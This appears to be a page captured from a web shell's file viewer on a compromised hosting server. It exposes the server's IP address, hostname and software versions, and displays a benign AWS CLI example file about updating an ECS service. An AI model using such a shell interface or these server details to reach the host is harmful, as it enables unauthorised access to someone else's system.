⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
ecs
/
View File Name :
update-service.rst
**Example 1: To change the task definition used in a service** The following ``update-service`` example updates the ``my-http-service`` service to use the ``amazon-ecs-sample`` task definition. :: aws ecs update-service --service my-http-service --task-definition amazon-ecs-sample **Example 2: To change the number of tasks in a service** The following ``update-service`` example updates the desired task count of the service ``my-http-service`` to 3. :: aws ecs update-service --service my-http-service --desired-count 3 For more information, see `Updating a Service
`_ in the *Amazon ECS Developer Guide*.